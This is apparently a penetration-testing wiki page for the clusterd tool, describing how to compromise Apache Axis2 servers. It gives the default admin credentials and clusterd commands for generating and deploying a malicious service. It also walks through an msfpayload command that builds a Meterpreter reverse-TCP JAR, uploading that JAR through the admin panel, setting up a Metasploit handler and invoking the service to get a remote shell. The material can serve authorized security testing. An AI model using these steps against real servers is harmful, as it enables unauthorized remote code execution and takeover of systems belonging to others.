Skip to content

Axis2

Jump to bottom
Stephen Breen edited this page May 7, 2014 · 5 revisions

##Apache Axis2 Apache Axis2 is a software stack for creating and serving XML web services written in Java. There are two approaches to attacking an Axis2 server: *Attacking the management interface *Attacking the web services themselves

###Attacking the management interface We will begin with attacking the management interface. The interface can USUALLY be found at http://:/axis2/axis2-admin. The "/axis2/" portion of the URL may very well differ, it will be the path to the axis2 installation. Also keep in mind that Axis2 usually runs on TOP of Tomcat or another application server, deployed as a module. If you discover a Tomcat server and are unable to exploit it, see if the Axis2 paths exist. The default username and password for the admin interface is: *admin/axis2

These credentials are included by default up to the current version and often overlooked since a typical Axis2 deployment does not require administrative interaction with the web interface.

####Clusterd Usage Clusterd supports deployment to Axis2 when administrative credentials are known, and payload generation to create malicious Axis2 services. The Axis2 modules are not version dependant, deployment with credentials should work across all versions of Axis2 to date.

To generate a payload, simply run: *sudo python clusterd.py -a axis2 --gen-payload localhost:4444

To deploy and invoke: *sudo python clusterd.py -a axis2 -i localhost -p 8080 --deploy shell.jar --deployer service_upload --usr-auth admin:axis2 --invoke

The service_upload deployer uses the Axis2 web interface to upload a payload. Axis2 also supports a REST interface for deployment.

####Manually Exploiting the Admin Interface

  1. Generate a payload. This is most easily accomplished using clusterd as described above. Msfpayload does not natively support generation of payloads that are compatible with Axis2. If you prefer to generate a custom payload, consider reviewing the source in clusterd's generate_payload.py. Basically this is what happens: *msfpayload java/meterpreter/reverse_tcp LHOST=localhost LPORT=4444 R > shell.jar *Create "META-INF/services.xml" in the JAR file (see clusterd source for contents of services.xml) *Add PayloadServlet.class (included in clusterd) to "metasploit/PayloadServlet.class" in the JAR.

  2. Upload the payload at https://:/axis2/axis2-admin/upload

  3. Confirm through the admin interface that the service exists and is activated. Under “List Services” find and click on the name of the service, it should be "shell" for clusterd payloads.

  4. Start a reverse handler for the payload:

  • use multi/handler
  • set PAYLOAD java/meterpreter/reverse_tcp
  • set LPORT 4444
  • set LHOST x.x.x.x
  • exploit
  1. Invoke the service by accessing http://:/axis2/services/shell

###Attacking Axis2 Web Services Attacking webservices is a subject on its own, however the following may be helpful when gathering information on Axis2 web services:

*http://:/axis2/services/listServices **Provides a list of available services *http://:/axis2/services/Version?wsdl **Provides a WSDL that can be imported to SOAPUI for a given service

Clone this wiki locally